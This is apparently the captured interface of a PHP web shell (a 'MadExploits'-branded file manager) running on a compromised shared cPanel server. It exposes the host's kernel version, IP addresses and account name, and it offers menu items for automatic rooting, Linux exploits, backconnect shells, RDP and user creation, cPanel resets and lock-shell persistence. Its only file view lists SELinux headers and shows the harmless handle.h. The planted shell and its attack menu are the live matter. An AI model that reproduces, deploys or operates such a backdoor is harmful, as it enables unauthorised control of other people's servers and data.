Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.94
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
sepol /
[ HOME SHELL ]
Name
Size
Permission
Action
policydb
[ DIR ]
drwxr-xr-x
boolean_record.h
1.45
KB
-rw-r--r--
booleans.h
2.12
KB
-rw-r--r--
context.h
682
B
-rw-r--r--
context_record.h
1.56
KB
-rw-r--r--
debug.h
905
B
-rw-r--r--
errcodes.h
783
B
-rw-r--r--
handle.h
976
B
-rw-r--r--
iface_record.h
1.73
KB
-rw-r--r--
interfaces.h
1.3
KB
-rw-r--r--
module.h
2.55
KB
-rw-r--r--
node_record.h
2.67
KB
-rw-r--r--
nodes.h
1.21
KB
-rw-r--r--
policydb.h
4.33
KB
-rw-r--r--
port_record.h
1.85
KB
-rw-r--r--
ports.h
1.21
KB
-rw-r--r--
roles.h
270
B
-rw-r--r--
sepol.h
667
B
-rw-r--r--
user_record.h
2.26
KB
-rw-r--r--
users.h
1.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : handle.h
#ifndef _SEPOL_HANDLE_H_ #define _SEPOL_HANDLE_H_ struct sepol_handle; typedef struct sepol_handle sepol_handle_t; /* Create and return a sepol handle. */ sepol_handle_t *sepol_handle_create(void); /* Get whether or not dontaudits will be disabled, same values as * specified by set_disable_dontaudit. This value reflects the state * your system will be set to upon commit, not necessarily its * current state.*/ int sepol_get_disable_dontaudit(sepol_handle_t * sh); /* Set whether or not to disable dontaudits, 0 is default and does * not disable dontaudits, 1 disables them */ void sepol_set_disable_dontaudit(sepol_handle_t * sh, int disable_dontaudit); /* Set whether module_expand() should consume the base policy passed in. * This should reduce the amount of memory required to expand the policy. */ void sepol_set_expand_consume_base(sepol_handle_t * sh, int consume_base); /* Destroy a sepol handle. */ void sepol_handle_destroy(sepol_handle_t *); #endif
Close